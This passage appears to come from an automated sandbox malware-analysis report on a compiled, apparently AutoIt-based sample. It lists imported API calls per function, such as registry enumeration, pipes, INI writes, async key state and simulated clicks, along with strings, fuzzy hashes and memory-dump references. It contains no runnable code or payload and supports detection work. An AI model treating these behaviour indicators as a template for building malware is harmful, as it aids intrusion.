                                                          • VariantInit.OLEAUT32(?), ref: 002C8CFD
                                                          • CharUpperBuffW.USER32(?,?), ref: 002C8E0C
                                                          • VariantClear.OLEAUT32(?), ref: 002C8F84
                                                            • Part of subcall function 002B7B1D: VariantInit.OLEAUT32(00000000), ref: 002B7B5D
                                                            • Part of subcall function 002B7B1D: VariantCopy.OLEAUT32(00000000,?), ref: 002B7B66
                                                            • Part of subcall function 002B7B1D: VariantClear.OLEAUT32(00000000), ref: 002B7B72
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                          • API String ID: 4237274167-1221869570
                                                          • Opcode ID: 4e76ad59e5ded53876746cd301bcf38014983c3d728bc3d6b6e17c9864825fdf
                                                          • Instruction ID: 2e14d38f227b28c1ac1aa70b83abab4b9857ec812835c497532de9e5d4e709ef
                                                          • Opcode Fuzzy Hash: 4e76ad59e5ded53876746cd301bcf38014983c3d728bc3d6b6e17c9864825fdf
                                                          • Instruction Fuzzy Hash: 8E917A706243419FC700DF24C480E5ABBF5AF89354F148A6EF88A8B3A1DB30E959CF52
                                                          APIs
                                                            • Part of subcall function 0026436A: _wcscpy.LIBCMT ref: 0026438D
                                                          • _memset.LIBCMT ref: 002B332E
                                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 002B335D
                                                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 002B3410
                                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 002B343E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                          • String ID: 0
                                                          • API String ID: 4152858687-4108050209
                                                          • Opcode ID: e0f572cd55343464149b369cbe594a052139fbba9d7ed12b275b28fca61f8d08
                                                          • Instruction ID: 12abe62112dc931988f238fb7c88a6858411f1e9ce9090289d889cf6ae9af39d
                                                          • Opcode Fuzzy Hash: e0f572cd55343464149b369cbe594a052139fbba9d7ed12b275b28fca61f8d08
                                                          • Instruction Fuzzy Hash: 4451D3316283029BD716DF28D845AABB7F8AF453A0F08452DF895D31D1DB70DEA4CB92
                                                          APIs
                                                          • _memset.LIBCMT ref: 002B2F67
                                                          • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 002B2F83
                                                          • DeleteMenu.USER32(?,00000007,00000000), ref: 002B2FC9
                                                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00317890,00000000), ref: 002B3012
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Menu$Delete$InfoItem_memset
                                                          • String ID: 0
                                                          • API String ID: 1173514356-4108050209
                                                          • Opcode ID: 2478d1c23d7b6f532d0dee9c6a565363bcebcf2d4316b795d7b271c1ad4434b2
                                                          • Instruction ID: 76b80b38ffc3e33aae7befd0cecccf4eda0d90674475c30804e6ea73c16f3c00
                                                          • Opcode Fuzzy Hash: 2478d1c23d7b6f532d0dee9c6a565363bcebcf2d4316b795d7b271c1ad4434b2
                                                          • Instruction Fuzzy Hash: 4841C531219342DFD720DF24C884BAABBE8FF89390F144A1DF46597291DB70E915CB52
                                                          APIs
                                                            • Part of subcall function 00261A36: _memmove.LIBCMT ref: 00261A77
                                                            • Part of subcall function 002AB79A: GetClassNameW.USER32(?,?,000000FF), ref: 002AB7BD
                                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 002A9ACC
                                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 002A9ADF
                                                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 002A9B0F
                                                            • Part of subcall function 00261821: _memmove.LIBCMT ref: 0026185B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$_memmove$ClassName
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 365058703-1403004172
                                                          • Opcode ID: 0d491c9bf8916aecafe081152e01dfdd421f64576ebcb0dcdca04f08664b1e46
                                                          • Instruction ID: 28161a09332311815b7a4608bd7af65254dceb8df9c1f55524da4d58473be9a8
                                                          • Opcode Fuzzy Hash: 0d491c9bf8916aecafe081152e01dfdd421f64576ebcb0dcdca04f08664b1e46
                                                          • Instruction Fuzzy Hash: 5D213172960104AFDB14EBA0EC86CFFB778DF46360F14411AF825972E1DF740CAA9A60
                                                          APIs
                                                            • Part of subcall function 00252111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0025214F
                                                            • Part of subcall function 00252111: GetStockObject.GDI32(00000011), ref: 00252163
                                                            • Part of subcall function 00252111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0025216D
                                                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 002D6A86
                                                          • LoadLibraryW.KERNEL32(?), ref: 002D6A8D
                                                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 002D6AA2
                                                          • DestroyWindow.USER32(?), ref: 002D6AAA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                          • String ID: SysAnimate32
                                                          • API String ID: 4146253029-1011021900
                                                          • Opcode ID: bd3bcb365c9abe8617ce06e352b3ab4782139943eacd02142b14916bd68cd464
                                                          • Instruction ID: 74e2fd2b26fa2eba8bd2efabe1b1afa638829276f6a60169c98db5f28da79ca5
                                                          • Opcode Fuzzy Hash: bd3bcb365c9abe8617ce06e352b3ab4782139943eacd02142b14916bd68cd464
                                                          • Instruction Fuzzy Hash: E2219971120106AFEF108F64DC89EBB77ADEF59324F10861AFA91A72D0D371DC619760
                                                          APIs
                                                          • GetStdHandle.KERNEL32(0000000C), ref: 002B7377
                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 002B73AA
                                                          • GetStdHandle.KERNEL32(0000000C), ref: 002B73BC
                                                          • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 002B73F6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: CreateHandle$FilePipe
                                                          • String ID: nul
                                                          • API String ID: 4209266947-2873401336
                                                          • Opcode ID: 40e5117f0a8302fe0113e762c59a133759095e137448436982a65f0947dc60fd
                                                          • Instruction ID: 22021f8dc8e1bd937d04c79a3604df5d2685c29f65eecc25198440a969307407
                                                          • Opcode Fuzzy Hash: 40e5117f0a8302fe0113e762c59a133759095e137448436982a65f0947dc60fd
                                                          • Instruction Fuzzy Hash: 8621A170518306ABDB208F68EC48ADA7BF4AF847A0F204A59FDA0D72D0D7B09861DB50
                                                          APIs
                                                          • GetStdHandle.KERNEL32(000000F6), ref: 002B7444
                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 002B7476
                                                          • GetStdHandle.KERNEL32(000000F6), ref: 002B7487
                                                          • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 002B74C1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: CreateHandle$FilePipe
                                                          • String ID: nul
                                                          • API String ID: 4209266947-2873401336
                                                          • Opcode ID: f9549dbf625dbafbcf55e9676973a505311d22b3f7ae7f87e34eb54a74406cd4
                                                          • Instruction ID: eaa7cb3bd15e5bf3f3162d07046f82e62507308df3f864b2402ff3a0a85869bf
                                                          • Opcode Fuzzy Hash: f9549dbf625dbafbcf55e9676973a505311d22b3f7ae7f87e34eb54a74406cd4
                                                          • Instruction Fuzzy Hash: B421C4315183069BDB209F689C89AD97BF8AF95771F200B09FDA1E72D1D7B09861CB50
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 002BB297
                                                          • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 002BB2EB
                                                          • __swprintf.LIBCMT ref: 002BB304
                                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000,002E0980), ref: 002BB342
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$InformationVolume__swprintf
                                                          • String ID: %lu
                                                          • API String ID: 3164766367-685833217
                                                          • Opcode ID: fff8a8c1b6f70409cf89454c4f199040e1429ddff093580fb850002098eb7580
                                                          • Instruction ID: 49fec9b1d1286e91157095d770165025c962d336ec5dce88ccafb5be5a2d2f82
                                                          • Opcode Fuzzy Hash: fff8a8c1b6f70409cf89454c4f199040e1429ddff093580fb850002098eb7580
                                                          • Instruction Fuzzy Hash: B0219230610108AFCB10EFA5DC85DAEB7F8EF49704B0040A9F905DB252DB71EA55CF61
                                                          APIs
                                                            • Part of subcall function 00261821: _memmove.LIBCMT ref: 0026185B
                                                            • Part of subcall function 002AAA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 002AAA6F
                                                            • Part of subcall function 002AAA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 002AAA82
                                                            • Part of subcall function 002AAA52: GetCurrentThreadId.KERNEL32 ref: 002AAA89
                                                            • Part of subcall function 002AAA52: AttachThreadInput.USER32(00000000), ref: 002AAA90
                                                          • GetFocus.USER32 ref: 002AAC2A
                                                            • Part of subcall function 002AAA9B: GetParent.USER32(?), ref: 002AAAA9
                                                          • GetClassNameW.USER32(?,?,00000100), ref: 002AAC73
                                                          • EnumChildWindows.USER32(?,002AACEB), ref: 002AAC9B
                                                          • __swprintf.LIBCMT ref: 002AACB5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                          • String ID: %s%d
                                                          • API String ID: 1941087503-1110647743
                                                          • Opcode ID: 427ce1d783499ec1c7b06f5af4fddf7cc6f93ae03ead3e5aa74e4cf0c343bde2
                                                          • Instruction ID: 50bd78f6085847830582183c0eeadaa429ea9813ecfc763aa82cb93f2b05647a
                                                          • Opcode Fuzzy Hash: 427ce1d783499ec1c7b06f5af4fddf7cc6f93ae03ead3e5aa74e4cf0c343bde2
                                                          • Instruction Fuzzy Hash: D211F075210205ABDF11AFA09DC5FEA33BCAF45310F044065FA08AA143DF7168A5CF71
                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?), ref: 002B2318
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: BuffCharUpper
                                                          • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                          • API String ID: 3964851224-769500911
                                                          • Opcode ID: c1ee1668ef474c11a8d9330ea29fa4eb41942b88cbf825e3b2894c3d9e9937a0
                                                          • Instruction ID: cee804dcaa64251c3ca418da9fc3d22399a86d00f8fe892bff2c7f03a40e2996
                                                          • Opcode Fuzzy Hash: c1ee1668ef474c11a8d9330ea29fa4eb41942b88cbf825e3b2894c3d9e9937a0
                                                          • Instruction Fuzzy Hash: E611A134920219DFCF00EF94D8A04EEB3B4FF1A344B1084A9D81467291EB366D2ACF50
                                                          APIs
                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 002CF2F0
                                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 002CF320
                                                          • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 002CF453
                                                          • CloseHandle.KERNEL32(?), ref: 002CF4D4
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                          • String ID:
                                                          • API String ID: 2364364464-0
                                                          • Opcode ID: 7f3b09e25ae42d640ba8d98271da09457213f80a3cc0129716b00bd47e2ebe0f
                                                          • Instruction ID: 163b24f99968d103ba69b4afee9004fb5b0b4eaa6637a024a90b1f7a51b0f678
                                                          • Opcode Fuzzy Hash: 7f3b09e25ae42d640ba8d98271da09457213f80a3cc0129716b00bd47e2ebe0f
                                                          • Instruction Fuzzy Hash: E081AF716203019FD720EF28D886F2AF7E5AF48714F04892DF999DB292D7B0AC548F56
                                                          APIs
                                                            • Part of subcall function 00261A36: _memmove.LIBCMT ref: 00261A77
                                                            • Part of subcall function 002D147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002D040D,?,?), ref: 002D1491
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002D075D
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002D079C
                                                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 002D07E3
                                                          • RegCloseKey.ADVAPI32(?,?), ref: 002D080F
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 002D081C
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                          • String ID:
                                                          • API String ID: 3440857362-0
                                                          • Opcode ID: 6df404a2b27f12792c788a4f2878cef86455070518235df562f0fe5c81b80d4c
                                                          • Instruction ID: 900db25a7884bd50fbc790cb3146f5bb65b1edda7d310c673bf08a588830e9be
                                                          • Opcode Fuzzy Hash: 6df404a2b27f12792c788a4f2878cef86455070518235df562f0fe5c81b80d4c
                                                          • Instruction Fuzzy Hash: BE515931228245AFD704EF64C885F6AB7E9BF84304F04891EF9958B2A1DB70ED65CF52
                                                          APIs
                                                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 002BEC62
                                                          • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 002BEC8B
                                                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 002BECCA
                                                            • Part of subcall function 00254D37: __itow.LIBCMT ref: 00254D62
                                                            • Part of subcall function 00254D37: __swprintf.LIBCMT ref: 00254DAC
                                                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 002BECEF
                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 002BECF7
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                          • String ID:
                                                          • API String ID: 1389676194-0
                                                          • Opcode ID: 6ae1554cd3fa7aa30cba5fd487ee10a785da13267110b20bbf54bc0d5e481b8e
                                                          • Instruction ID: bfa6b71951a65753d4e2aecdd47c6262a7ffe2967605d585b54d0cad2ccb62e5
                                                          • Opcode Fuzzy Hash: 6ae1554cd3fa7aa30cba5fd487ee10a785da13267110b20bbf54bc0d5e481b8e
                                                          • Instruction Fuzzy Hash: EF513B35A10105DFCF01EF64C9859AEBBF5EF08314B148099E809AB362CB31ED65DF54
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: afb44ae0424499a7482d7d275e0bd5f668bd6193ccf0a9bf20823c4382f9c00e
                                                          • Instruction ID: 8c4ff03b6abdf32a23706b684e34c3478eb02bc1c4d213f12b3d3f02b896a930
                                                          • Opcode Fuzzy Hash: afb44ae0424499a7482d7d275e0bd5f668bd6193ccf0a9bf20823c4382f9c00e
                                                          • Instruction Fuzzy Hash: 7641D336924115AFEB10DF28CC89FADFBB8EB09310F154166F816A73D1C7B09D61DAA1
                                                          APIs
                                                          • GetCursorPos.USER32(?), ref: 00252727
                                                          • ScreenToClient.USER32(003177B0,?), ref: 00252744
                                                          • GetAsyncKeyState.USER32(00000001), ref: 00252769
                                                          • GetAsyncKeyState.USER32(00000002), ref: 00252777
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: AsyncState$ClientCursorScreen
                                                          • String ID:
                                                          • API String ID: 4210589936-0
                                                          • Opcode ID: 4cda145cdb459ab78f55aefcd337f26b6563532b3f8b59c38629ef81fda2281f
                                                          • Instruction ID: 52f535881d6e9408711d08ab885fe3f360a4a0d3ef777505f68339636e42db03
                                                          • Opcode Fuzzy Hash: 4cda145cdb459ab78f55aefcd337f26b6563532b3f8b59c38629ef81fda2281f
                                                          • Instruction Fuzzy Hash: B3416F3552410AFBDF159F64C848AE9FB74FB0A325F208356F824962D0C730AD68DFA0
                                                          APIs
                                                          • GetWindowRect.USER32(?,?), ref: 002A95E8
                                                          • PostMessageW.USER32(?,00000201,00000001), ref: 002A9692
                                                          • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 002A969A
                                                          • PostMessageW.USER32(?,00000202,00000000), ref: 002A96A8
                                                          • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 002A96B0
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: MessagePostSleep$RectWindow
                                                          • String ID:
                                                          • API String ID: 3382505437-0
                                                          • Opcode ID: c0fa9ff5b4306d9cb0d20354b13b13e342ccb59f6a135486572e75c92a000834
                                                          • Instruction ID: cd7a0b338ac8274682b2f8c36b0fe8efa050123082c2c1d40bcd1f55b8bf6efc
                                                          • Opcode Fuzzy Hash: c0fa9ff5b4306d9cb0d20354b13b13e342ccb59f6a135486572e75c92a000834
